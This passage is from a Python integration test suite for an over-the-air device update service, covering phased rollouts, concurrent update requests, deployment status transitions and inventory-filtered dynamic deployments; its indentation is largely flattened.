                # NOTE: add half a second of buffer time, as a just-in-time
                # request would break the remainder of the test
while now < (
start_ts - timedelta(milliseconds=500 * WAITING_MULTIPLIER)
):
# Spam update requests from random non-updated devices
dev = random.choice(devices)
status_code = try_update(dev)
assert status_code == 204 or status_code == 429
now = datetime.utcnow()
# Sleep the last 500ms to let the next phase start
time.sleep(0.5 * WAITING_MULTIPLIER)
else:
raise ValueError(
"Invalid phased deployment request, "
"missing `start_ts` for phase %d" % i
)
# Test for all devices in the deployment
if devices_updated > 0:
                # Already updated
for device in devices[:devices_updated]:
status_code = try_update(device)
assert status_code == 204
# Check phase count has not been incremented by the above requests
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS_ID.format(id=deployment_id)
)
phase = resp.json()["phases"][i]
assert phase["device_count"] == 0
# Devices that should update
for n, device in enumerate(
devices[devices_updated : (devices_updated + batch_sizes[i])], 1
):
status_code = try_update(device)
assert status_code == expected_update_status
if expected_update_status == 200:
# Make sure to override artifact_name property
device.artifact_name = deployment["artifact_name"]
# Check phase count is incremented correctly
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", os.path.join("/deployments", deployment_id)
)
phase = resp.json()["phases"][i]
assert phase["device_count"] == n
if i < num_phases - 1:
# Capacity exceeded
for device in devices[(devices_updated + batch_sizes[i]) :]:
status_code = try_update(device)
assert status_code == 204
devices_updated += batch_sizes[i]
# Check phase count equals batch size
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", os.path.join("/deployments", deployment_id)
)
phases = resp.json()["phases"]
for p in range(i + 1):
assert phases[p]["device_count"] == batch_sizes[p]
for p in range(i + 1, len(phases)):
assert phases[p]["device_count"] == 0
# Finally confirm that deployment is finished
assert resp.json()["status"] == "finished"
def test_phased_regular_deployment(self, clean_mongo):
"""
Phased equivalent of a regular deployment.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt()
deployment_req = {
"name": "phased-regular-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [{}],
}
self.try_phased_updates(deployment_req, devs, utoken)
def test_delayed_deployment(self, clean_mongo):
"""
Uses a single phase with a delayed start-time.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt()
deployment_req = {
"name": "phased-delayed-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ")
}
],
}
self.try_phased_updates(deployment_req, devs, utoken)
def test_two_phases_full_spec(self, clean_mongo):
"""
Two phases, with batch_size and start_ts specified for both phases.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt()
deployment_req = {
"name": "two-fully-spec-deployments",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{
"batch_size": 10,
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
},
{
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=2 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
"batch_size": 90,
},
],
}
self.try_phased_updates(deployment_req, devs, utoken)
def test_three_phased_deployments(self, clean_mongo):
"""
Three phases; with no start_ts in first and no batch_size in third.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt(nr_devices=101)
deployment_req = {
"name": "three-phased-deployments",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{"batch_size": 13},
{
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
"batch_size": 17,
},
{
"batch_size": 29,
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=2 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
},
{
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=3 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ")
},
],
}
self.try_phased_updates(deployment_req, devs, utoken)
def test_disallow_empty_phase(self, clean_mongo):
"""
Test that in the case a batch is empty due to rounding errors,
the server returns 400, with an appropriate error message.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt(nr_devices=101)
deployment_req = {
"name": "empty-batch-test",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs[:11]],
"phases": [
{"batch_size": 10},
{
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
"batch_size": 20,
},
{
"batch_size": 5,
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=2 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
},
{
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=3 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ")
},
],
}
resp = (
ApiClient(deployments.URL_MGMT)
.with_auth(utoken)
.call("POST", deployments.URL_DEPLOYMENTS, body=deployment_req)
)
assert resp.status_code == 400
assert "Attempt to create a batch with zero devices not allowed" in resp.text
assert "Batch: (3) will be empty" in resp.text
def test_no_artifact_for_devices(self, clean_mongo):
"""
Tests that phase counts and statistics are updated correctly
when there are no applicable artifact for the devices.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt(nr_devices=101)
for dev in devs:
dev.device_type = "pranked_exclamation-mark"
deployment_req = {
"name": "three-phased-deployments",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{"batch_size": 13},
{
"batch_size": 29,
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
},
{
"start_ts": (
datetime.utcnow()
+ timedelta(seconds=2 * 15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ")
},
],
}
self.try_phased_updates(
deployment_req, devs, utoken, expected_update_status=204
)
def calculate_phase_sizes(deployment_request):
batch_sizes = []
devices_in_phases = 0
device_count = len(deployment_request["devices"])
last_phase_idx = len(deployment_request["phases"]) - 1
for i, phase in enumerate(deployment_request["phases"]):
if i != last_phase_idx:
batch_sizes.append(int((phase["batch_size"] / 100.0) * device_count))
else:
batch_sizes.append(device_count - devices_in_phases)
devices_in_phases += batch_sizes[i]
return batch_sizes
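# Worked example (illustrative): for a deployment request with 100 devices and
# phases [{"batch_size": 10}, {"batch_size": 45}, {}], calculate_phase_sizes
# returns [10, 45, 45] -- the last phase absorbs all remaining devices.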
class TestPhasedRolloutConcurrencyEnterprise:
def try_concurrent_phased_updates(
self, deployment, devices, user_token, expected_update_status=200
):
# Static helper function
# Setup Deployment APIs
api_mgmt_deploy = ApiClient(deployments.URL_MGMT)
status_codes = []
num_phases = len(deployment["phases"])
batch_sizes = [
int((deployment["phases"][i]["batch_size"] / 100.0) * len(devices))
for i in range(num_phases - 1)
]
# Final batch_size might not be specified
batch_sizes.append(len(devices) - sum(batch_sizes))
# POST deployment
resp = api_mgmt_deploy.with_auth(user_token).call(
"POST", deployments.URL_DEPLOYMENTS, body=deployment
)
assert resp.status_code == 201
# Store the location from the GET /deployments/{id} request
deployment_id = os.path.basename(resp.headers["Location"])
for i in range(num_phases):
if i == 0 and "start_ts" not in deployment["phases"][i]:
                # The first phase doesn't need to specify `start_ts`
pass
elif "start_ts" in deployment["phases"][i]:
# Sleep until next phase starts
start_ts = datetime.strptime(
deployment["phases"][i]["start_ts"], "%Y-%m-%dT%H:%M:%SZ"
)
now = datetime.utcnow()
# While phase in progress:
# Spam update requests from random batches of devices
# concurrently by creating a pool of minimum 4 processes
# that send requests in parallel.
with mp.Pool(max(4, mp.cpu_count())) as pool:
while now <= (
start_ts - timedelta(milliseconds=500 * WAITING_MULTIPLIER)
):
                        # NOTE: ^ add half a second of buffer time to
                        # account for the delay in sending and
                        # processing the request.
                        # Give the devices array a stir
random.shuffle(devices)
# Concurrently process a batch of requests
device_batch = devices[: max(4, mp.cpu_count())]
status_codes = pool.map(try_update, device_batch)
                        # Create a status code map for a useful debug
                        # message in case we receive a non-empty response
status_code_map = {}
for s in [200, 204, 400, 404, 429, 500]:
status_code_map[s] = sum(
(map(lambda sc: sc == s, status_codes))
)
# Check that all requests received an empty response
assert (status_code_map[204] + status_code_map[429]) == len(
status_codes
), (
"Expected empty response (204) during inactive "
+ "phase, but received the following status "
+ "code frequencies: %s" % status_code_map
)
now = datetime.utcnow()
# Sleep the last 500ms to let the next phase start
time.sleep(0.5 * WAITING_MULTIPLIER)
else:
raise ValueError(
"Invalid phased deployment request, "
"missing `start_ts` for phase %d" % i
)
# Make all devices attempt to update (in a concurrent manner)
# and check that the number of successful responses equals
# the number of devices in the batch.
with mp.Pool(processes=max(4, mp.cpu_count())) as pool:
status_codes = pool.map(try_update, devices)
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS_ID.format(id=deployment_id)
)
assert resp.status_code == 200
phases = resp.json()["phases"]
assert sum(map(lambda s: s == 200, status_codes)) == batch_sizes[i]
for j in range(len(devices)):
if status_codes[j] == 200:
devices[j].artifact_name = "deployments-phase-testing"
# Check phase count equals batch size
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS_ID.format(id=deployment_id)
)
assert resp.status_code == 200
phases = resp.json()["phases"]
for p in range(i + 1):
assert phases[p]["device_count"] == batch_sizes[p]
for p in range(i + 1, len(phases)):
assert phases[p]["device_count"] == 0
# Finally confirm that deployment is finished
assert resp.json()["status"] == "finished"
def test_two_phases_concurrent_devices(self, clean_mongo):
"""
Two phases where devices perform requests in parallel to stress
the backends capability of handling parallel requests.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt()
deployment_req = {
"name": "two-fully-spec-deployments",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{"batch_size": 10},
{
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
"batch_size": 90,
},
],
}
self.try_concurrent_phased_updates(deployment_req, devs, utoken)
# test status update
class StatusVerifier:
def __init__(self, deploymentsm, deploymentsd):
self.deploymentsm = deploymentsm
self.deploymentsd = deploymentsd
def status_update_and_verify(
self,
device_id,
device_token,
deployment_id,
user_token,
status_update,
device_deployment_status,
deployment_status,
status_update_error_code=204,
substate_update="",
substate="",
):
body = {"status": status_update}
if substate_update != "":
body = {"status": status_update, "substate": substate_update}
# Update device status upon successful request
resp = self.deploymentsd.with_auth(device_token).call(
"PUT", deployments.URL_STATUS.format(id=deployment_id), body=body,
)
assert resp.status_code == status_update_error_code
self.status_verify(
deployment_id=deployment_id,
user_token=user_token,
device_id=device_id,
device_deployment_status=device_deployment_status,
deployment_status=deployment_status,
substate=substate,
)
def status_verify(
self,
deployment_id,
user_token,
device_id="",
device_deployment_status="",
deployment_status="",
substate="",
):
if device_deployment_status != "":
resp = self.deploymentsm.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS_DEVICES.format(id=deployment_id)
)
            assert resp.status_code == 200
devices = resp.json()
for device in devices:
if device["id"] == device_id:
assert device["status"] == device_deployment_status
if substate != "":
assert device["substate"] == substate
if deployment_status != "":
resp = self.deploymentsm.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS.format(id=deployment_id)
)
            assert resp.status_code == 200
assert resp.json()[0]["status"] == deployment_status
class TestDeploymentsStatusUpdateBase:
def do_test_deployment_status_update(
self, clean_mongo, user_token, devs, deploy_to_group=None
):
"""
        Deployment with four devices.
        Requires five devices (the last one won't be part of the deployment).
"""
deploymentsm = ApiClient(deployments.URL_MGMT)
deploymentsd = ApiClient(deployments.URL_DEVICES)
status_verifier = StatusVerifier(deploymentsm, deploymentsd)
# Make deployment request
deployment_req = {
"name": "phased-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs[:-1]],
}
if deploy_to_group:
deployment_req = {
"name": "phased-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [],
"group": deploy_to_group,
"retries": 0,
}
resp = deploymentsm.with_auth(user_token).call(
"POST", deployments.URL_DEPLOYMENTS, deployment_req
)
if deploy_to_group:
resp = deploymentsm.with_auth(user_token).call(
"POST",
deployments.URL_DEPLOYMENTS + "/group/" + deploy_to_group,
deployment_req,
)
assert resp.status_code == 201
# Store the location from the GET /deployments/{id} request
deployment_id = os.path.basename(resp.headers["Location"])
# Verify that the deployment is in "pending" state
status_verifier.status_verify(
deployment_id=deployment_id,
user_token=user_token,
deployment_status="pending",
)
default_artifact_name = "bugs-bunny"
default_device_type = "qemux86-64"
# Try to retrieve next update and assert expected status code
resp = deploymentsd.with_auth(devs[0].token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": getattr(
devs[0], "artifact_name", default_artifact_name
),
"device_type": getattr(devs[0], "device_type", default_device_type),
},
)
assert resp.status_code == 200
# Try to retrieve next update for the device that already has the artifact
resp = deploymentsd.with_auth(devs[1].token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": "deployments-phase-testing",
"device_type": getattr(devs[1], "device_type", default_device_type),
},
)
assert resp.status_code == 204
status_verifier.status_verify(
deployment_id=deployment_id,
user_token=user_token,
device_id=devs[1].id,
device_deployment_status="already-installed",
deployment_status="inprogress",
)
# Try to retrieve next update for the device with incompatible device type
resp = deploymentsd.with_auth(devs[2].token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": getattr(
devs[2], "artifact_name", default_artifact_name
),
"device_type": "foo",
},
)
assert resp.status_code == 204
status_verifier.status_verify(
deployment_id=deployment_id,
user_token=user_token,
device_id=devs[2].id,
device_deployment_status="noartifact",
deployment_status="inprogress",
)
# device not part of the deployment
status_verifier.status_update_and_verify(
device_id=devs[4].id,
device_token=devs[4].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="installing",
device_deployment_status="does-not-matter",
deployment_status="inprogress",
status_update_error_code=500,
)
# wrong status
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="foo",
device_deployment_status="pending",
deployment_status="inprogress",
status_update_error_code=400,
)
# device deployment: pending -> downloading
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="downloading",
device_deployment_status="downloading",
deployment_status="inprogress",
)
# devs[0] deployment: downloading -> installing
# substate: "" -> "foo"
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="installing",
device_deployment_status="installing",
deployment_status="inprogress",
substate_update="foo",
substate="foo",
)
# devs[0] deployment: installing -> downloading
"""
        note that until the device deployment is finished,
        a transition to any of the valid statuses is allowed
"""
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="downloading",
device_deployment_status="downloading",
deployment_status="inprogress",
substate="foo",
)
# devs[0] deployment: downloading -> rebooting
# substate: "foo" -> "bar"
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="rebooting",
device_deployment_status="rebooting",
deployment_status="inprogress",
substate_update="bar",
substate="bar",
)
# devs[0] deployment: rebooting -> success
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="success",
device_deployment_status="success",
deployment_status="inprogress",
substate="bar",
)
# devs[0] deployment already finished
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="pending",
device_deployment_status="success",
deployment_status="inprogress",
status_update_error_code=400,
substate="bar",
)
# Try to retrieve next update and assert expected status code
resp = deploymentsd.with_auth(devs[3].token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": getattr(
devs[3], "artifact_name", default_artifact_name
),
"device_type": getattr(devs[3], "device_type", default_device_type),
},
)
assert resp.status_code == 200
# device deployment: pending -> failure
# deployment: inprogress -> finished
status_verifier.status_update_and_verify(
device_id=devs[3].id,
device_token=devs[3].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="failure",
device_deployment_status="failure",
deployment_status="finished",
)
class TestDeploymentsStatusUpdate(TestDeploymentsStatusUpdateBase):
def test_deployment_status_update(self, clean_mongo):
_user, user_token, devs = setup_devices_and_management_st(5)
self.do_test_deployment_status_update(clean_mongo, user_token, devs)
class TestDeploymentsStatusUpdateEnterprise(TestDeploymentsStatusUpdateBase):
def test_deployment_status_update(self, clean_mongo):
_user, _tenant, user_token, devs = setup_devices_and_management_mt(5)
self.do_test_deployment_status_update(clean_mongo, user_token, devs)
class TestDeploymentsToGroupStatusUpdate(TestDeploymentsStatusUpdateBase):
def test_deployment_status_update(self, clean_mongo):
_user, user_token, devs = setup_devices_and_management_st(
5, deploy_to_group="g0"
)
self.do_test_deployment_status_update(
clean_mongo, user_token, devs, deploy_to_group="g0"
)
class TestDeploymentsToGroupStatusUpdateEnterprise(TestDeploymentsStatusUpdateBase):
def test_deployment_status_update(self, clean_mongo):
_user, _tenant, user_token, devs = setup_devices_and_management_mt(
5, deploy_to_group="g0"
)
self.do_test_deployment_status_update(
clean_mongo, user_token, devs, deploy_to_group="g0"
)
def create_tenant(name, username, plan):
tenant = create_org(name, username, "correcthorse", plan=plan)
user = tenant.users[0]
r = ApiClient(useradm.URL_MGMT).call(
"POST", useradm.URL_LOGIN, auth=(user.name, user.pwd)
)
assert r.status_code == 200
user.utoken = r.text
return tenant
@pytest.fixture(scope="function")
def setup_tenant(clean_mongo):
uuidv4 = str(uuid.uuid4())
tenant = create_tenant(
"test.mender.io-" + uuidv4, "some.user+" + uuidv4 + "@example.com", "enterprise"
)
# give workflows time to finish provisioning
time.sleep(10)
return tenant
@pytest.fixture(scope="function")
def clean_mongo_client(mongo):
"""Fixture setting up a clean (i.e. empty database). Yields
common.MongoClient connected to the DB.
Useful for tests with multiple testcases:
- protects the whole test func as usual
- but also allows calling MongoClient.cleanup() between cases
"""
mongo_cleanup(mongo)
yield mongo
mongo_cleanup(mongo)
def predicate(attr, scope, t, val):
return {"attribute": attr, "scope": scope, "type": t, "value": val}
def create_filter(name, predicates, utoken):
f = {"name": name, "terms": predicates}
r = (
ApiClient(inventory_v2.URL_MGMT)
.with_auth(utoken)
.call("POST", inventory_v2.URL_FILTERS, f)
)
assert r.status_code == 201
f["id"] = r.headers["Location"].split("/")[1]
return f
def create_dynamic_deployment(
name, predicates, utoken, max_devices=None, phases=None, status_code=201
):
f = create_filter(name, predicates, utoken)
api_dep_v2 = ApiClient(deployments_v2.URL_MGMT)
depid = None
with get_mender_artifact(name) as filename:
upload_image(filename, utoken)
deployment_req = {
"name": name,
"artifact_name": name,
"filter_id": f["id"],
}
if max_devices is not None:
deployment_req["max_devices"] = max_devices
if phases is not None:
deployment_req["phases"] = phases
res = api_dep_v2.with_auth(utoken).call(
"POST", deployments_v2.URL_DEPLOYMENTS, deployment_req
)
assert res.status_code == status_code
if status_code != 201:
return None
depid = res.headers["Location"].split("/")[5]
newdep = get_deployment(depid, utoken)
assert newdep["name"] == name
assert newdep["filter"]["id"] == f["id"]
assert newdep["filter"]["terms"] == predicates
assert newdep["status"] == "pending"
assert newdep["dynamic"]
return newdep
def get_deployment(depid, utoken):
api_dep_v1 = ApiClient(deployments.URL_MGMT)
res = api_dep_v1.with_auth(utoken).call(
"GET", deployments.URL_DEPLOYMENTS_ID, path_params={"id": depid}
)
assert res.status_code == 200
return res.json()
def make_device_with_inventory(attributes, utoken, tenant_token):
devauthm = ApiClient(deviceauth.URL_MGMT)
devauthd = ApiClient(deviceauth.URL_DEVICES)
invm = ApiClient(inventory.URL_MGMT)
d = make_accepted_device(devauthd, devauthm, utoken, tenant_token)
"""
verify that the status of the device in inventory is "accepted"
"""
accepted = False
timeout = 10
for i in range(timeout):
r = invm.with_auth(utoken).call("GET", inventory.URL_DEVICE.format(id=d.id))
if r.status_code == 200:
dj = r.json()
for attr in dj["attributes"]:
if attr["name"] == "status" and attr["value"] == "accepted":
accepted = True
break
if accepted:
break
time.sleep(1)
if not accepted:
raise ValueError(
"status for device %s has not been propagated within %d seconds"
% (d.id, timeout)
)
submit_inventory(attributes, d.token)
d.attributes = attributes
return d
def submit_inventory(attrs, token):
invd = ApiClient(inventory.URL_DEV)
r = invd.with_auth(token).call("PATCH", inventory.URL_DEVICE_ATTRIBUTES, attrs)
assert r.status_code == 200
def update_deployment_status(deployment_id, status, token):
api_dev_deploy = ApiClient(deployments.URL_DEVICES)
body = {"status": status}
resp = api_dev_deploy.with_auth(token).call(
"PUT", deployments.URL_STATUS.format(id=deployment_id), body=body,
)
assert resp.status_code == 204
def assert_get_next(code, dtoken, artifact_name=None):
api_dev_deploy = ApiClient(deployments.URL_DEVICES)
resp = api_dev_deploy.with_auth(dtoken).call(
"GET",
deployments.URL_NEXT,
qs_params={"artifact_name": "dontcare", "device_type": "arm1"},
)
assert resp.status_code == code
if code == 200:
assert resp.json()["artifact"]["artifact_name"] == artifact_name
def set_status(depid, status, dtoken):
api_dev_deploy = ApiClient(deployments.URL_DEVICES)
res = api_dev_deploy.with_auth(dtoken).call(
"PUT", deployments.URL_STATUS.format(id=depid), body={"status": status},
)
assert res.status_code == 204
def get_stats(depid, token):
api_dev_deploy = ApiClient(deployments.URL_MGMT)
res = api_dev_deploy.with_auth(token).call(
"GET", deployments.URL_DEPLOYMENTS_STATISTICS.format(id=depid),
)
assert res.status_code == 200
return res.json()
def verify_stats(stats, expected):
for k, v in stats.items():
if k in expected:
assert stats[k] == expected[k]
else:
assert stats[k] == 0
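# Example (illustrative): verify_stats(stats, {"success": 5, "failure": 5})
# asserts that exactly 5 devices succeeded, 5 failed, and that every other
# counter (pending, downloading, installing, ...) is zero.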
class TestDynamicDeploymentsEnterprise:
@pytest.mark.parametrize(
"tc",
[
# single predicate, $eq
{
"name": "single predicate, $eq",
"predicates": [predicate("foo", "inventory", "$eq", "123")],
"matches": [
[{"name": "foo", "value": "123"}],
[{"name": "foo", "value": "123"}, {"name": "bar", "value": "1"}],
[
{"name": "foo", "value": ["123", "qwerty"]},
{"name": "bar", "value": "1"},
],
],
"nonmatches": [
[{"name": "foo", "value": "1"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": 1}, {"name": "bar", "value": 123}],
[{"name": "baz", "value": "baz"}],
],
},
# single predicate, $ne
{
"name": "single predicate, $ne",
"predicates": [predicate("foo", "inventory", "$ne", "123")],
"matches": [
[{"name": "foo", "value": "1"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": 1}, {"name": "bar", "value": 123}],
[{"name": "baz", "value": "baz"}],
],
"nonmatches": [
[{"name": "foo", "value": "123"}],
[{"name": "foo", "value": "123"}, {"name": "bar", "value": "1"}],
[
{"name": "foo", "value": ["123", "qwerty"]},
{"name": "bar", "value": "1"},
],
],
},
# single predicate, $in
{
"name": "single predicate, $in",
"predicates": [predicate("foo", "inventory", "$in", ["1", "2", "3"])],
"matches": [
[{"name": "foo", "value": "1"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "2"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "3"}, {"name": "bar", "value": "123"}],
],
"nonmatches": [
[{"name": "foo", "value": "4"}, {"name": "bar", "value": 123}],
[{"name": "foo", "value": 1}, {"name": "bar", "value": 123}],
[{"name": "bar", "value": "1"}],
],
},
# single predicate, $gt
{
"name": "single predicate, $gt",
"predicates": [predicate("foo", "inventory", "$gt", "abc")],
"matches": [
[{"name": "foo", "value": "cde"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "def"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "fgh"}, {"name": "bar", "value": "123"}],
],
"nonmatches": [
[{"name": "foo", "value": "aaa"}, {"name": "bar", "value": 123}],
[{"name": "foo", "value": "aab"}, {"name": "bar", "value": 123}],
[{"name": "bar", "value": "abb"}],
],
},
# single predicate, $exists
{
"name": "single predicate, $exists",
"predicates": [predicate("foo", "inventory", "$exists", True)],
"matches": [
[{"name": "foo", "value": "cde"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "def"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "fgh"}, {"name": "bar", "value": "123"}],
],
"nonmatches": [
[{"name": "bar", "value": 123}],
[{"name": "bar", "value": 456}],
],
},
# combined predicates on single attr
{
"name": "combined predicates on single attr",
"predicates": [
predicate("foo", "inventory", "$gte", 100),
predicate("foo", "inventory", "$lte", 200),
],
"matches": [
[{"name": "foo", "value": 100}],
[{"name": "foo", "value": 200}, {"name": "bar", "value": "1"}],
[{"name": "foo", "value": 150}, {"name": "bar", "value": "1"}],
],
"nonmatches": [
[{"name": "foo", "value": 99}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": 201}, {"name": "bar", "value": 123}],
],
},
# combined predicates on many attrs
{
"name": "combined predicates on many attrs",
"predicates": [
predicate("foo", "inventory", "$eq", "foo"),
predicate("bar", "inventory", "$in", ["bar1", "bar2", "bar3"]),
],
"matches": [
[{"name": "foo", "value": "foo"}, {"name": "bar", "value": "bar1"}],
[{"name": "foo", "value": "foo"}, {"name": "bar", "value": "bar2"}],
[
{"name": "foo", "value": ["foo"]},
{"name": "bar", "value": "bar3"},
],
],
"nonmatches": [
[{"name": "foo", "value": "foo"}],
[{"name": "foo", "value": "foo"}],
[{"name": "foo", "value": "bar1"}],
],
},
],
)
def test_assignment_based_on_filters(self, clean_mongo_client, tc):
""" Test basic dynamic deployments characteristic:
- deployments match on inventory attributes via various filter predicates
"""
uuidv4 = str(uuid.uuid4())
tenant = create_tenant(
"test.mender.io-" + uuidv4,
"some.user+" + uuidv4 + "@example.com",
"enterprise",
)
user = tenant.users[0]
matching_devs = [
make_device_with_inventory(attrs, user.utoken, tenant.tenant_token)
for attrs in tc["matches"]
]
nonmatching_devs = [
make_device_with_inventory(attrs, user.utoken, tenant.tenant_token)
for attrs in tc["nonmatches"]
]
dep = create_dynamic_deployment("foo", tc["predicates"], user.utoken)
assert dep["initial_device_count"] == len(matching_devs)
for d in matching_devs:
assert_get_next(200, d.token, "foo")
for d in nonmatching_devs:
assert_get_next(204, d.token)
def test_unbounded_deployment_lifecycle(self, setup_tenant):
""" Check how a dynamic deployment (no bounds) progresses through states
based on device activity (status, statistics).
"""
user = setup_tenant.users[0]
dep = create_dynamic_deployment(
"foo", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
devs = [
make_device_with_inventory(
[{"name": "foo", "value": "foo"}],
user.utoken,
setup_tenant.tenant_token,
)
for i in range(10)
]
for d in devs:
assert_get_next(200, d.token, "foo")
# just getting a 'next' deployment has no effect on overall status
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "pending"
# when some devices start activity ('downloading', 'installing', 'rebooting'),
# the deployment becomes 'inprogress'
for d in devs:
if devs.index(d) < 3:
set_status(dep["id"], "downloading", d.token)
elif devs.index(d) < 6:
set_status(dep["id"], "installing", d.token)
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "inprogress"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"downloading": 3, "installing": 3, "pending": 4})
        # even after all devices finish, the unbounded deployment stays 'inprogress'
        # (with no max_devices it is never considered complete)
for d in devs:
if devs.index(d) < 5:
set_status(dep["id"], "success", d.token)
else:
set_status(dep["id"], "failure", d.token)
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "inprogress"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"success": 5, "failure": 5})
def test_bounded_deployment_lifecycle(self, setup_tenant):
""" Check how a dynamic deployment with max_devices progresses through states
based on device activity (status, statistics).
"""
user = setup_tenant.users[0]
dep = create_dynamic_deployment(
"foo",
[predicate("foo", "inventory", "$eq", "foo")],
user.utoken,
max_devices=10,
)
devs = [
make_device_with_inventory(
[{"name": "foo", "value": "foo"}],
user.utoken,
setup_tenant.tenant_token,
)
for i in range(10)
]
for d in devs:
assert_get_next(200, d.token, "foo")
# just getting a 'next' deployment has no effect on overall status
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "pending"
# when devices start activity ('downloading', 'installing', 'rebooting'),
# the deployment becomes 'inprogress'
for d in devs:
if devs.index(d) < 5:
set_status(dep["id"], "downloading", d.token)
else:
set_status(dep["id"], "installing", d.token)
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "inprogress"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"downloading": 5, "installing": 5})
# all devices finish - and the deployment actually becomes 'finished'
for d in devs:
set_status(dep["id"], "success", d.token)
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "finished"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"success": 10})
# an extra dev won't get this deployment
extra_dev = make_device_with_inventory(
[{"name": "foo", "value": "foo"}], user.utoken, setup_tenant.tenant_token
)
assert_get_next(204, extra_dev.token, "foo")
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "finished"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"success": 10})
def test_deployment_ordering(self, setup_tenant):
""" Check that devices only get dynamic deployments fresher than the
latest one it finished.
In other words, after updating its attributes the device won't accidentally
fall into a deployment previous to what it tried already.
"""
user = setup_tenant.users[0]
create_dynamic_deployment(
"foo1", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
